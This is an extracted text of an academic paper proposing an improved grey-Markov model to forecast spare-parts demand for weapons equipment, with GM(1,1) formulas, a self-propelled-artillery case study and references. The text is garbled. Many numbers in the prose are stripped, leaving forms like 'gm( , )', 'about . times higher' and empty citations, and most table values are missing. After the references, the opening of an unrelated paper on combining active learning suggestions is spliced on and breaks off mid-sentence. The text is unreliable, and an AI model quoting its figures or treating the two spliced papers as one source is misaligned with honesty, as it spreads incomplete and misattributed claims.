/ijanmc- - demand forecast of weapon equipment spare parts based on improved gray-markov model li ou school of computer science and engineering xi’an technological university xi’an, china e-mail: @ .com liu bailin school of computer science and engineering xi’an technological university xi’an, china e-mail: @qq.com li chenhao school of computer science and engineering xi’an technological university xi’an, china e-mail: @qq.com gao dan school of computer science and engineering xi’an technological university xi’an, china e-mail: @qq.com abstract—the demand for spare parts of weapons and equipment is time-varying and random. it is difficult to predict the demand for spare parts. therefore, on the basis of gray gm( , ), a state transition probability matrix based on improved state division is used to establish a demand forecast model for weapon equipment and spare parts. the model not only considers the characteristics of the gm( , ) model's strong handling of monotonic sequences, but also extracts the characteristics of random fluctuation response of data through the transformation of the state transition probability matrix, avoiding the phenomenon of the worst prediction results when the maximum probability state is not the actual state. it is proved through experiments that the prediction result based on the improved gray-markov model is superior to the traditional model and the classic gray-markov prediction model, and the accuracy of the improved model is about . times higher than that of the gray model. keywords-grey theory; markov model; spare parts forecast i. introduction weaponry is composed of many parts, and these parts need to be repaired and replaced during use. in order to shorten the short interval between the repairs of weaponry and equipment, increase normal working hours, reserve a reasonable number of spare parts for replacement at any time. weaponry spare parts are effective measures to improve the availability of weaponry and equipment, reduce life cycle costs, and ensure the effectiveness of combat effectiveness on time [ ]. in the issue of spare parts support, the prediction of spare parts demand is an important means to promote "precision support", and is also one of the key and difficult points in the research of equipment comprehensive support. there are many reasons for the occurrence of spare parts demand. in addition to the reliability rules of weapons and equipment itself, the use of equipment, repair strategies and maintenance methods will affect the number and time of spare parts demand. spare parts demand shows randomness and fluctuation therefore, equipment managers urgently need to find a method to predict the random demand for repair spare parts. at present, there are many technologies for demand planning, forecasting and decision-making, mainly including time series forecasting models, regression analysis methods, support vector machines, neural networks, gray forecasting and decision making, markov forecasting, combined optimization decision- making, and their between each other. among them, the method based on the time series prediction model requires a large amount of historical data, and the data must not have periodic changes or mutations. neural network-based spare parts demand prediction method requires a large number of statistical samples, and the international journal of advanced network, monitoring and controls volume , no. , prediction results are highly subjective and random. 
these factors greatly limit the application of artificial intelligence methods [ ]. therefore, how to improve the prediction accuracy of the demand for spare parts for weapons and equipment is an important link for effectively guaranteeing the supply of spare parts for our military equipment. the gray prediction model is suitable for solving the problems of small samples, poor information and uncertainty. it has less calculation and is convenient and practical. it has a good prediction effect for short- term prediction, but it has a poor fit for long-term prediction and volatile data series. the markov theory describes the influence of random factors and the internal laws of transition between states through the state transition probability, which can effectively make up for the deficiencies of the gray model [ ]. to this end, this paper proposes to predict the demand for spare parts for weapons and equipment based on an improved gray markov model, in order to effectively improve the prediction accuracy of random volatility data and broaden the application range of gray theory. ii. research status of spare parts demand management with the development and progress of economic globalization and science and technology, people have higher requirements for product quality and production efficiency, and there are more and more complex equipment in industrial production. in the process of using complex equipment, failures will inevitably occur due to factors such as maintenance damage, wear, corrosion, and expiration of life. in order to restore the normal operation of the equipment in time, minimize the economic loss caused by equipment failure or shutdown. [ ] companies generally purchase and store a certain number of accessories in advance, which are called spare parts. spare parts, as support materials for the daily maintenance and emergency handling of equipment, are an important factor in ensuring the normal operation of complex equipment. accurate and timely spare parts supply can ensure the continuity of production operations of the enterprise. spare parts are an important material basis for equipment support work. spare parts management work has become an important part of equipment support work. spare parts planning is affected by spare parts demand, so an effective spare parts demand forecasting model will provide an important basis for spare parts management decision making, and it is also the basis for quickly responding to changes in customer needs and improving corporate service levels. the demand for spare parts is very special. in most cases, the demand for spare parts occurs in uncertain and irregular time intervals, and the quantity is also unstable and changeable. strictly speaking, demand is usually divided into: slow-moving spare parts, intermittent demand spare parts. the consumption of spare parts is extremely special. some spare parts consume a large amount, while some spare parts consume a small amount, and have not even been consumed in a few years. this greatly increases the difficulty of accurately predicting the consumption of spare parts. in fact, in addition to conventional methods for forecasting spare parts, it is more important to study forecasting methods for uncertain or intermittent demand. spare parts demand forecasting is a very important part of equipment management, and it is the basis of inventory management. 
accurately planning the supply of spare parts can reduce the huge budget spent on spare parts, supply the required spare parts in time, improve the availability of equipment and the completeness of weapons and equipment, ensure that the equipment can complete production tasks and normal operations on time, and guarantee weapons and equipment in military exercises and battles, fighters will not be missed. on the other hand, accurate demand forecasting will have a very important impact on the formulation of spare parts inventory strategies and the construction of inventory models [ ]. in many complex equipment companies, spare parts inventory management has not attracted enough attention. in general: on the one hand, there are generally backward spare parts inventory management methods, improper inventory management methods, difficult spare parts search, and excessive backlog of a large number of unimportant spare parts, resulting in high inventory costs of enterprises; on the other hand, some spare parts inventory will not be able to meet equipment maintenance or customer demand changes. the shortage of key spare parts may cause equipment delays in maintenance or even shutdown accidents occasionally. inventory issues increasingly become a bottleneck restricting the survival and development of complex equipment companies. for companies, the most important issue is how to use inventory management strategy and inventory management system optimization to greatly reduce the amount of inventory funds occupied by spare parts, and then increase capital turnover and corporate economic benefits. international journal of advanced network, monitoring and controls volume , no. , iii. theoretical overview of grey system and markov chain a. basic concepts of gray system the naming of the gray system is different from the naming methods of other systems, it is named according to the degree of mastery of the information. the completely unknown information is represented by "black", this system is called the black system, and the information that is clearly grasped is represented by "white", this system is called the white system. according to this law, it is clear that "gray" is in the middle ground, and our grasp of this part of information is in a state of "ambiguity". this system is called the gray system. the most widely used grey system in the field of forecasting is the gm( , ) model. due to its small sample data, simple calculation and other advantages, it has been widely used in various fields such as society, economy, ecology, agriculture, etc., especially in the case of small samples, poor information and uncertain systems and lack of data, it has also been successful. application, which determines that the gm( , ) model in the gray system occupies an important position in the fields of prediction and decision-making. in order to expand the scope of application and prediction accuracy of the gm( , ) model, many scholars have done a lot of theoretical research. these studies mainly focus on: processing the original data, constructing the background value in the gm( , ) model, discussing the method of determining the initial value in the gm( , ) model, combining the gray system theory and other theoretical models combine. among them, there are two types of concepts in optimized combination forecasting. one is a forecasting method that selects appropriate weights for the weighted average of the forecast results obtained from several forecasting methods. 
the key is to determine the weighting coefficient of each individual forecasting method. compare in several prediction methods, choose the prediction model with the best fit or the smallest standard deviation as the best model for prediction. combination forecasting is to play its role when a single forecasting model cannot completely describe the changing law of the forecast. b. basic principles of the gray system using the information currently available to explore and predict unknown information is the most important theory of the gray system, which is the process from "grey" to "white" until the research purpose is achieved. the basic principles of the gray system are: ) principle of difference information "difference" is information, and all information must be different. saying "thing a is different from thing b" means that a has special information that b does not, which is the so-called difference. the basic way people understand the world is to observe the differences of different things in the objective world. ) the principle of non-uniqueness of solution when the information is not fully grasped, the solution obtained for it is uncertain and non-unique. this is caused by the incompleteness of the gray system information and cannot be avoided. ) principle of least information how to use the least information that has been mastered to maximize the effect is an important feature of the gray system to study unknown information. ) cognitive basis principle information is the basis of cognition. all cognition must be based on the information you have. ) new information priority principle the new information has priority in cognition, and its use value is greater than the old information. ) the principle of immortality incomplete information and uncertainty are universal. information is completely relative and temporary. the completeness of information is specific to a specific environment, and the objective environment is constantly changing, which will also be accompanied by the emergence of new uncertainties. c. grey prediction model the gray prediction model uses gm ( , ) modeling on the known information to find the simulated value, and then predicts the unknown information. this determines the change range of the gray forecast object, and its range must be bounded and related to time. as the core model of grey prediction, gm( , ) model is widely used in practical research. the establishment of the model is based on the data in the time series. through this model, the law of data change is analyzed, and the internal relationship is analyzed from the external relationship of various factors to find the hidden law, thereby generating the corresponding data sequence, and performing differential equation modeling. forecast the development trend of things. predicting the gray system is to mine and discover the development laws of the system by processing the international journal of advanced network, monitoring and controls volume , no. , original data and establishing the gray model, so as to predict the future state of the system. since the gray system contains both known information and unknown information, its prediction is the prediction of the gray process that is related to time and changes in a certain direction. although the laws shown by some gray processes are random and disorderly, their essence is bounded, orderly, and potentially regular. 
there are four main types of gray system forecasts: a) sequence prediction: refers to the prediction of the behavior of the system variables in the future. after the qualitative analysis of the data series, the appropriate sequence operator is selected, and the gray model is established based on the number sequence after the operation of the operator. the accuracy of the model it can be used to predict after inspection. b) catastrophe prediction: refers to the prediction of the abnormal value of the gray system, that is, the prediction of the time when a given gray number occurs, so as to provide guidance for the work of relevant departments. c) system prediction: refers to the prediction of multiple variables in the system together, which is mainly used to predict the relationship between system variables and reveal the development and changes of the system. d) topological prediction: also called waveform prediction. when the original data fluctuates greatly, the gray model is used to predict the waveform of future behavior data. d. markov process markov process has great significance in stochastic process and is widely used in biology, physics and other sciences. the definition of markov chain was first proposed in the early nineteenth century, and then people began to study and explore a random process with no aftereffect. ineffectiveness means that the state of the future is only related to the present and not related to the past. markov has made great contributions to probability theory, number theory, and differential equations[ ]. during - , he proposed and studied markov chains. his research results are of great help to probability theory. the random process he studied is called markov process. markov processes are continuous or discrete according to their state and time parameters, and are divided into three categories ) time and state are both discrete markov processes, called markov chains. ) the markov process with continuous time and discrete state is called continuous-time markov chain. ) time and state are continuous, which is called markov process. the research object of markov model is mainly the state of the system and the transition between states. the main purpose of establishing markov model for calculation analysis is to predict the possible state of variables in the future by analyzing the current state and change trend of system variables, and then provide corresponding theoretical basis for decision-making. the steps of using markov process to predict include: step reasonably divide the state. when the sample has less data, the number of states should be as small as possible, so that each state contains more data, which can more objectively reflect the transfer law between each state; step calculate the transition probability between each state in the markov process of the system, and determine the corresponding state transition matrix; step according to the initial state of the system and the transition probability matrix to predict the state in the future. iv. improved gray markov model a. gray model grey system theory was first proposed by our famous scholar professor deng julong in . it is a theory of gray system modeling, prediction, analysis, control and decision-making. grey prediction method is a new type of nonlinear prediction technology in the late s, which is a method system based on sequence operators and gray sequence production. 
the gray prediction model uses accumulated generating, inverse accumulated generating, or stepwise-ratio generation techniques, and uses differential fitting to directly convert the time series into a first-order univariate constant-coefficient differential equation. according to the principle of continuity of prediction, gray theory can be used to obtain fairly accurate prediction results [ ]. for data series that are relatively short, carry little information, and show weak regularity, i.e., data that fit the characteristics of a poor-information system, the gray model shows its superiority. the gray model is usually divided into a first-order single-variable model and a first-order combined model; the gm(1,1) model is used in this paper.

1) the original data sequence required for forecasting the demand of weapon equipment spare parts is:

$x^{(0)} = \{x^{(0)}(1), x^{(0)}(2), \ldots, x^{(0)}(n)\}$  (1)

among them: $x^{(0)}(k) \ge 0$, $k = 1, 2, \ldots, n$.

2) accumulate the original sequence once:

$x^{(1)} = \{x^{(1)}(1), x^{(1)}(2), \ldots, x^{(1)}(n)\}$  (2)

among them: $x^{(1)}(k) = \sum_{i=1}^{k} x^{(0)}(i)$, $k = 1, 2, \ldots, n$.

3) generate the adjacent-mean sequence:

$z^{(1)} = \{z^{(1)}(2), z^{(1)}(3), \ldots, z^{(1)}(n)\}$  (3)

among them: $z^{(1)}(k) = \frac{1}{2}\left(x^{(1)}(k) + x^{(1)}(k-1)\right)$.

4) establish the whitening equation of the model:

$\frac{dx^{(1)}}{dt} + a x^{(1)} = b$  (4)

among them: $a$ and $b$ are undetermined parameters.

5) the gray equation of the model is:

$x^{(0)}(k) + a z^{(1)}(k) = b$  (5)

6) the corresponding time response equation is:

$\hat{x}^{(1)}(k+1) = \left(x^{(0)}(1) - \frac{b}{a}\right) e^{-ak} + \frac{b}{a}$  (6)

7) the least-squares estimates of the parameters $a$ and $b$ are:

$\begin{bmatrix} \hat{a} \\ \hat{b} \end{bmatrix} = (B^{T}B)^{-1}B^{T}Y$  (7)

$B = \begin{bmatrix} -z^{(1)}(2) & 1 \\ -z^{(1)}(3) & 1 \\ \vdots & \vdots \\ -z^{(1)}(n) & 1 \end{bmatrix}, \quad Y = \begin{bmatrix} x^{(0)}(2) \\ x^{(0)}(3) \\ \vdots \\ x^{(0)}(n) \end{bmatrix}$

8) reduce the prediction results to the original-sequence forecast:

$\hat{x}^{(0)}(k+1) = \hat{x}^{(1)}(k+1) - \hat{x}^{(1)}(k)$  (8)

among them: $k = 1, 2, \ldots, n$.

it can be seen from the above that the model makes its prediction on the once-accumulated original sequence. because the once-accumulated sequence is monotonic, the model is suitable for predicting data that follow an exponential law, and the prediction error is large for randomly fluctuating data. the gm(1,1) forecasting model occupies an important position in grey system theory. the starting point of the model is to extract valuable information from the time series itself and to explore the law governing the studied quantity without considering external influences. the gray system prediction model takes a small amount of data as its research object; its characteristics are simple calculation, simple principle, and high prediction accuracy when modelling small amounts of information, but its accuracy drops sharply for irregular and fluctuating data, so the gray prediction model does not give good results for arbitrary data. the markov chain prediction model is different from the gray system model: it makes up for the shortcomings of the gray prediction model and can handle data with large fluctuations, but it requires the prediction object to have the markov property. in this paper, the two models are combined to form a gray-markov prediction model: the gm(1,1) model is used to characterize the trend of the original data sequence, and the markov prediction model is applied to the simulated data obtained by the gm(1,1) model, so that the strengths of each compensate for the weaknesses of the other and the accuracy is improved.
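as an illustration of the fitting procedure above, here is a minimal numpy sketch of gm(1,1): it accumulates the series, builds the b and y matrices, solves for a and b by least squares, and restores forecasts by first-order differencing. the demand values used are made-up placeholders, not the paper's data.

import numpy as np

def gm11(x0, horizon=1):
    """fit a gm(1,1) model to a 1-d series x0 and forecast `horizon` extra points."""
    x0 = np.asarray(x0, dtype=float)
    n = len(x0)
    x1 = np.cumsum(x0)                           # once-accumulated sequence
    z1 = 0.5 * (x1[1:] + x1[:-1])                # adjacent-mean sequence
    B = np.column_stack((-z1, np.ones(n - 1)))   # coefficient matrix
    Y = x0[1:]                                   # target vector
    a, b = np.linalg.lstsq(B, Y, rcond=None)[0]  # least-squares estimates of a, b
    k = np.arange(n + horizon)
    x1_hat = (x0[0] - b / a) * np.exp(-a * k) + b / a  # time response equation
    x0_hat = np.empty(n + horizon)
    x0_hat[0] = x0[0]
    x0_hat[1:] = np.diff(x1_hat)                 # restore to the original sequence
    return x0_hat

# made-up spare-parts demand series for illustration only.
demand = [12, 14, 13, 16, 18, 17, 20]
print(gm11(demand, horizon=1))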
b. grey markov model

according to gray system theory, the gray mean model and the markov model are fused, and the resulting gray-markov model is used to predict the demand for weapon equipment spare parts. specifically, the gray mean model is used to predict the future demand for weapon equipment spare parts [ ], the state transition matrix determines the possible future state of the spare-parts demand, and finally the prediction result is corrected based on the ratio between the predicted value and the actual value, so as to realize an accurate prediction of weapon equipment spare parts.

after determining the state division and the state transition matrix, the conventional gray-markov model takes the state with the maximum transition probability as the next state [ ]~[ ]. this method ignores the possibility of the other transition probabilities and predicts from the last state only, so it is easily affected by randomness, which lowers the prediction accuracy; for this reason, the gray-markov model is improved here.

the modeling idea of the gray-markov combination model is to first establish a gray prediction model to obtain a prediction sequence, then use the relative difference sequence between the prediction sequence and the actual sequence to divide the state space, find the interval in which the predicted value lies, and modify the result of the model prediction according to that interval, which increases the credibility of the prediction [ ]. the transition probability matrix is calculated from the points of the original data sequence falling into each state, and the future trend is estimated from the state transition probability matrix.

calculate the state transition probability matrix and obtain the predicted values $\hat{x}^{(0)}(k)$, $k = 1, 2, \ldots, n$, from the gray model. using this curve as a reference, the plane is divided into several strip regions parallel to the trend curve, and each region constitutes a state. in this way, a non-stationary random sequence that satisfies the characteristics of a markov chain is divided into $n$ states. any state is

$\otimes_i = [\otimes_{1i}, \otimes_{2i}]$  (9)

among them: $\otimes_{1i} = \hat{x}^{(0)}(k) + a_i$, $\otimes_{2i} = \hat{x}^{(0)}(k) + b_i$.

the state transition probability is

$p_{ij}(k) = \frac{m_{ij}(k)}{m_i}, \quad i = 1, 2, \ldots, n$  (10)

in the formula, $m_{ij}(k)$ is the number of original data points that transfer from state $\otimes_i$ to state $\otimes_j$ after $k$ steps, and $m_i$ is the number of original data points in state $\otimes_i$.

the specific steps of the improved gray-markov prediction model are:

step 1: according to the original data $x^{(0)}(k)$, find the coefficients $a$ and $b$ of the gray model and obtain the fitted values $\hat{x}^{(0)}(k)$ corresponding to the actual data.

step 2: obtain the range of the relative residual sequence from the relative residual formula.

step 3: according to the actual situation, use the residuals to divide the relative residual range into $l$ states $\otimes_1, \otimes_2, \ldots, \otimes_l$.

step 4: based on the improved determination method for the markov chain state transition probabilities, calculate the one-step state transition probability matrix:

$P = \begin{bmatrix} p_{11} & p_{12} & \cdots & p_{1l} \\ p_{21} & p_{22} & \cdots & p_{2l} \\ \vdots & \vdots & \ddots & \vdots \\ p_{l1} & p_{l2} & \cdots & p_{ll} \end{bmatrix}$  (11)

among them: $p_{ij} \ge 0$, $\sum_{j=1}^{l} p_{ij} = 1$.

suppose a prediction system has four states $\otimes_1, \otimes_2, \otimes_3, \otimes_4$ and the last observation of the actual data $x^{(0)}(k)$ is in state $\otimes_i$; then the initial distribution is $\pi^{(0)} = (\pi^{(0)}_i)$, the distribution for the next value is $\pi^{(1)} = \pi^{(0)} P$, and from it the state interval in which the predicted data will lie can be obtained.
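the state-division and transition-matrix steps above can be sketched in a few lines of numpy. the example below divides relative residuals into equal-width states, counts one-step transitions to build the matrix p, and propagates the distribution of the last observed state one step forward; the residual values are invented for illustration, and the equal-width split is only one possible state-division rule.

import numpy as np

def divide_states(residuals, n_states):
    """assign each relative residual to one of n_states equal-width intervals."""
    lo, hi = min(residuals), max(residuals)
    edges = np.linspace(lo, hi, n_states + 1)
    # np.digitize against the interior edges yields indices 0 .. n_states-1.
    states = np.clip(np.digitize(residuals, edges[1:-1]), 0, n_states - 1)
    return states, edges

def transition_matrix(states, n_states):
    """estimate the one-step transition probability matrix p from a state sequence."""
    counts = np.zeros((n_states, n_states))
    for a, b in zip(states[:-1], states[1:]):
        counts[a, b] += 1
    row_sums = counts.sum(axis=1, keepdims=True)
    return np.divide(counts, row_sums, out=np.zeros_like(counts), where=row_sums > 0)

# invented relative residuals between actual and gm(1,1) fitted values.
residuals = [-0.08, 0.05, 0.12, -0.02, 0.07, -0.10, 0.03]
states, edges = divide_states(residuals, n_states=3)
P = transition_matrix(states, n_states=3)

# one-step-ahead state distribution, starting from the last observed state.
pi0 = np.zeros(3)
pi0[states[-1]] = 1.0
pi1 = pi0 @ P
print("P =\n", P)
print("next-state distribution:", pi1)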
the gray markov model is a model that combines the gray model and the markov model. its prediction process is: firstly generate gray according to the original data sequence, determine the parameters of the gray model according to the generated sequence; then use the established gray model carry out simulation prediction, test the accuracy of the established model according to the predicted value and actual value; then appropriately divide the gray prediction result into international journal of advanced network, monitoring and controls volume , no. , several states, establish a markov model, and predict and modify the state of the gray prediction result. according to the combination of gray model and markov model, traditional gray markov model prediction methods mainly include the following two: use the markov process to predict the sign of the gray prediction result residual model. after processing the given time series, a gray model is established, and the residual data series can be obtained by comparing the predicted result of the gray model with the actual value. the absolute value of the residual data sequence is used as the original data, and the gray prediction is performed to obtain the gray residual model. in order to improve the prediction accuracy, the markov process is used to predict the sign of the residual model at the future time. use markov process to predict the relative error of gray prediction results. establish a gray model based on the original data series, divide the state of the relative error of the gray prediction result, and predict the state of the relative error of the gray prediction result at the future time according to the current state transition, thereby improving the accuracy of the gray prediction result sex. the essence of the first combination forecasting method is to correct the gray residual model to improve the accuracy of the forecast; the essence of the second combination forecasting method is to directly correct the gray forecast results, so it is better than the first combination forecasting method. the calculation process is simple. when the markov process is used to predict the relative error of the gray results, there are two ways: one is to directly predict the state of the system in the future based on the initial state of the system and the n- step state transition matrix; the other is it is based on the initial state of the system and the one-step state transition matrix to predict the state of the next moment, and then based on the state of the next moment and the one-step state transition matrix to predict the state of the system at a later time. the advantage of the first method is that when predicting the state of the system at any time, the initial state used is known and accurate, and the various states of the system at a certain time are considered, and the probability of overestimation and underestimation is small; the disadvantage is: when predicting the state of the system at a distant time, a multi-step state transition matrix is needed. the calculation process of the multi-step state transition matrix is more complicated, and when the number of steps is large the accuracy of the corresponding matrix cannot be guaranteed. 
the advantage of the second way is that only the one-step state transition matrix is required for the markov prediction, so the calculation is simple, and when the predicted states are accurate the prediction results are very good. its disadvantage is that when the state of the system at some moment is predicted inaccurately, the forecast deviates substantially and the error propagates to the forecasts at subsequent moments. in what follows, the model corresponding to the first calculation method is called the first grey markov model, and the model corresponding to the second is called the second grey markov model.

the improved grey markov model is a combination of the first and second grey markov models: both calculation methods are used to predict the value of the system parameter at the future time, and the two results are then averaged. the improvement concerns only the markov part of the prediction, so the grey modeling part is identical to that of the gm(1,1) model; the difference lies in how the markov process corrects the grey prediction results. the main steps in establishing the improved grey markov model are: first, apply the grey generation to the prediction sequence, obtain the grey model parameters from the generated data sequence, determine the grey model, and make predictions; then divide the relative error of the grey prediction results into states and determine the state transitions of the markov process; finally, compute the correction values of the grey prediction according to the calculation methods of the first and second grey markov models, which yields the predicted value of the improved grey markov model.

v. case analysis

a. experiment verification

taking the consumption of a spare part of a certain type of self-propelled artillery at a military machinery maintenance institute as an example, table i gives the historical consumption of the spare part during several consecutive years of service. with the serial number of the observation on the horizontal axis and the spare-parts demand on the vertical axis, the improved grey markov model is used to predict the future demand for the spare part.

table i. historical data of spare parts consumption of a certain equipment (serial number versus number of spare parts).

these data are used as a sample, and the improved grey markov model and other models are used to predict the spare-parts demand for the eighth period; the results are then compared.

using the improved grey markov model to predict the demand for spare parts: from the data above, the original sequence $x^{(0)} = \{x^{(0)}(1), x^{(0)}(2), \ldots, x^{(0)}(8)\}$ is obtained. computing the smoothness ratios of the historical demand data shows that $x^{(0)}$ does not satisfy the smoothness requirement of the grey model, so a translation transformation is applied: taking a constant $c$, the shifted sequence $y^{(0)}(k) = x^{(0)}(k) + c$ and its smoothness ratios are computed.
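before walking through the numerical steps, the gm(1,1) fitting that is applied to the shifted sequence in the next step can be sketched as follows. this is a minimal sketch under the standard gm(1,1) construction (accumulation, background values, least-squares estimation of $a$ and $b$, prediction, and inverse accumulation); the translation constant and the demand values below are placeholders, not the data of the case study.

```python
import numpy as np

def gm11_fit_predict(x0, n_ahead=1):
    """fit a gm(1,1) model to the sequence x0 and return a, b and fitted/forecast values."""
    n = len(x0)
    x1 = np.cumsum(x0)                               # accumulated generating sequence
    z = 0.5 * (x1[1:] + x1[:-1])                     # background (immediate mean) values
    B = np.column_stack([-z, np.ones(n - 1)])
    Y = x0[1:]
    a, b = np.linalg.lstsq(B, Y, rcond=None)[0]      # development coefficient a, grey input b
    k = np.arange(n + n_ahead)
    x1_hat = (x0[0] - b / a) * np.exp(-a * k) + b / a
    x0_hat = np.concatenate([[x0[0]], np.diff(x1_hat)])   # inverse accumulation (reduction)
    return a, b, x0_hat

# hypothetical shifted demand sequence y0 = x0 + c (all values are placeholders)
c = 10.0
y0 = np.array([12.0, 14.5, 13.8, 15.2, 16.0, 15.5, 17.1, 16.8])
a, b, y0_hat = gm11_fit_predict(y0, n_ahead=1)
x0_hat = y0_hat - c        # subtract the translation constant to recover the original scale
print(a, b, x0_hat)
```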
the shifted sequence $y^{(0)}$ now satisfies the conditions of the grey model, so gm(1,1) modeling is applied to $y^{(0)}$, and the constant $c$ is subtracted at the end to recover $\hat{x}^{(0)}$. the accumulated generating sequence $y^{(1)}$ is obtained by a one-time accumulation of $y^{(0)}$, and the background-value sequence is generated from the immediate means $z^{(1)}(k) = \tfrac{1}{2}\left(y^{(1)}(k) + y^{(1)}(k-1)\right)$. the prediction equation of the grey model,

$\hat{y}^{(1)}(k+1) = \left(y^{(0)}(1) - \dfrac{b}{a}\right)e^{-ak} + \dfrac{b}{a}$,

is then established, the restored values $\hat{y}^{(0)}(k+1) = \hat{y}^{(1)}(k+1) - \hat{y}^{(1)}(k)$ are computed, and $\hat{x}^{(0)}$ is obtained by subtracting $c$. the fit between the simulated and actual values after this processing is shown in the figure below.

figure: fitting diagram of simulated value and actual value.

the relative residual sequence is then obtained. to divide the states, the range of the relative residuals is expanded by a fixed percentage above and below its observed minimum and maximum, the resulting interval is split into equally wide cells, and the number of states is varied in turn up to the length of the sequence, giving several sets of trial calculations. the one-step state transition probability matrix $P$ is calculated from the resulting state sequence, and the prediction results corrected with this matrix are listed in table ii.

table ii. forecast results (raw data versus model calculation data, together with the next predicted values).

the state transition probability matrix is used to predict the consumption of the equipment spare part in future periods, but its accuracy must still be checked with error-analysis formulas and compared with other grey models and with the classic grey markov model.

b. model comparison

the average error is calculated as

$\bar{e} = \dfrac{1}{n}\sum_{k=1}^{n}\lvert e(k)\rvert$

first, the average error of the model is calculated for different state divisions. as shown in table iii, the model accuracy is highest for one particular number of states, while several coarser and finer divisions give undesirable results.

table iii. model average error under different numbers of states.

second, the classic grey markov model is used for prediction and the prediction accuracies are compared, as listed in table iv.

table iv. forecast accuracy obtained with the gm(1,1) model, the classic grey markov model, and the improved model for different numbers of states.

for the smaller numbers of state divisions, the accuracy of the improved model is several times higher than that of the plain gm(1,1) model and matches the accuracy of the classic grey markov prediction model. for a larger number of state divisions, the improved model remains substantially more accurate than the gm(1,1) model, while the classic markov prediction model can no longer produce a forecast because a valid markov-chain state transition probability matrix cannot be constructed.
as the number of state divisions increases, the average accuracy of the improved grey markov model rises. the improved model supports a larger number of state divisions, so it outperforms the classic grey markov prediction model. the grey prediction method also has relatively loose application requirements: it does not need the data to follow a particular type of distribution and it does not require large-sample statistics, so it has clear application prospects.

vi. conclusion

in the field of spare-parts support for weapons and equipment, forecasting has always been a relatively difficult problem. because the demand for weapon equipment spare parts is time-varying and random, this paper proposes to predict that demand with an improved grey markov prediction method. a comparison of the prediction results shows that the modified model is superior to the traditional grey model and to the classic grey markov model in prediction accuracy, and it provides a reliable scientific basis for evaluating weapon equipment reliability and maintaining the equipment.

acknowledgment

this work is supported by the shanxi natural science basic research project.

references

[1] shao yanjun. research on preventive maintenance strategy of weapon equipment based on fault prediction [d]. north university of china.
[2] yan xiaoyao, yan li. application of neural network in the forecast of aviation weapon equipment spare parts demand [j]. today keyuan.
[3] zhou hao, huang shanzhong. equipment consumption prediction based on gm(1,1) and grey markov model [j]. journal of wuhan university of technology (transportation science and engineering edition).
[4] qiu chundong, yang yuzhi, wang chunyun. prediction of ct tube failure interval based on gray markov chain model [j]. modern instruments and medical.
[5] xu ning, dang yaoguo, ding song. gm(1,1) model background value optimization method based on error minimization [j]. control and decision.
[6] lv z, hou h, yi z, singh hp, editors. grey prediction model application in early warning of ice-coating lines [c]. recent developments in control, automation and power engineering (rdcape), international conference on.
[7] ma liangli, li gang, tao daoqiang. fault prediction method based on gray gm(1,1) model [j]. computer applications and software.
[8] shi pei, gao shan, su yanqin. an improved gm(1,1) model used in equipment fault prediction [j]. computer measurement and control.
[9] zhang wenjie, yuan hongping. research on the failure prediction of energy-saving equipment based on grey markov model [j]. system science and mathematics.
[10] li li, xiong wei, he jie, yuan xufeng, zou xiaosong. equipment failure rate prediction based on improved grey markov model [j]. electric power science and engineering.
[11] hong zhanpeng, chen zhenghua. gray markov model for metro car door failure prediction [j]. equipment manufacturing technology.
[12] ma chunmao, shao yanjun, pan hongxia, liu yongjiang. research on prediction of equipment failure interval based on gray markov model [j]. journal of ordnance engineering.
combining active learning suggestions

alasdair tran, cheng soon ong, and christian wolf

research school of computer science, australian national university, canberra, act, australia; data to decisions cooperative research centre, adelaide, sa, australia; machine learning research group, data61, csiro, canberra, act, australia; research school of astronomy and astrophysics, australian national university, canberra, act, australia; arc centre of excellence for all-sky astrophysics (caastro), sydney, nsw, australia

abstract

we study the problem of combining active learning suggestions to identify informative training examples by empirically comparing methods on benchmark datasets. many active learning heuristics for classification problems have been proposed to help us pick which instance to annotate next. but what is the optimal heuristic for a particular source of data? motivated by the success of methods that combine predictors, we combine active learners with bandit algorithms and rank aggregation methods. we demonstrate that a combination of active learners outperforms passive learning in large benchmark datasets and removes the need to pick a particular active learner a priori. we discuss challenges to finding good rewards for bandit approaches and show that rank aggregation performs well.

subjects data mining and machine learning
keywords active learning, bandit, rank aggregation, benchmark, multiclass classification

introduction

recent advances in sensors and scientific instruments have led to an increasing use of machine learning techniques to manage the data deluge. supervised learning has become a widely used paradigm in many big data applications. it relies on building a training set of labeled examples, which is time-consuming because it requires manual annotation from human experts.

the most common approach to producing a training set is passive learning, where we randomly select an instance from a large pool of unlabeled data to annotate, and we continue doing this until the training set reaches a certain size or until the classifier makes sufficiently good predictions. depending on how the underlying data is distributed, this process can be quite inefficient. alternatively, we can exploit the current set of labeled data to identify more informative unlabeled examples to annotate. for instance, we can pick examples near the decision boundary of the classifier, where the class probability estimates are uncertain (i.e., we are still unsure which class the example belongs to). many active learning heuristics have been developed to reduce the labeling bottleneck without sacrificing classifier performance. these heuristics actively choose the most informative examples to be labeled based on the predicted class probabilities. "overview of active learning" describes two families of algorithms in detail: uncertainty sampling and version space reduction.

in this paper, we present a survey of how we can combine suggestions from various active learning heuristics. in supervised learning, combining predictors is a well-studied
problem. many techniques such as adaboost (freund & schapire), which averages predictions from a set of models, and decision trees (breiman et al.), which select one model for making predictions in each region of the input space, have been shown to perform better than using a single model. inspired by this success, we propose to combine active learning suggestions with bandit and rank aggregation methods in "combining suggestions." the use of bandit algorithms to combine active learners has been studied before (baram, el-yaniv & luz; hsu & lin). borda count, a simple rank aggregation method, has been used in the context of multi-task learning for linguistic annotations (reichart et al.), where one active learner selects examples to improve the performance of multiple related tasks (e.g., part-of-speech tagging and named entity recognition). borda count has also been used in multi-label learning (reyes, morell & ventura) to combine uncertainty information from multiple labels. as far as we know, other aggregation methods have not been explored, and our work is the first time that social choice theory is used to rank and aggregate suggestions from multiple active learners.

this paper makes the following two main contributions:

1. we empirically compare four bandit and three rank aggregation algorithms in the context of combining active learning heuristics. we apply these algorithms to benchmark datasets from the uci machine learning repository (lichman) and a large dataset from the sloan digital sky survey (sdss) (alam et al.). the experimental setup and discussion are described in "experimental protocol, results, and discussion."

2. we propose two metrics for evaluation: the mean posterior balanced accuracy (mpba) and the strength of an algorithm. the mpba extends the metric proposed in brodersen et al. from the binary to the multi-class setting; it is an accuracy measure that takes class imbalance into account. the strength measure is a variation on the deficiency measure used in baram, el-yaniv & luz, which evaluates the performance of an active learner or combiner relative to passive learning. the main difference is that our measure assigns a higher number to better active learning methods and is upper-bounded by 1 for easier comparison across datasets.

overview of active learning

in this paper we consider the binary and multiclass classification settings, where we would like to learn a classifier $h$ that maps some feature space $\mathcal{X} \subseteq \mathbb{R}^d$ to a probability distribution over a finite label space $\mathcal{Y}$:

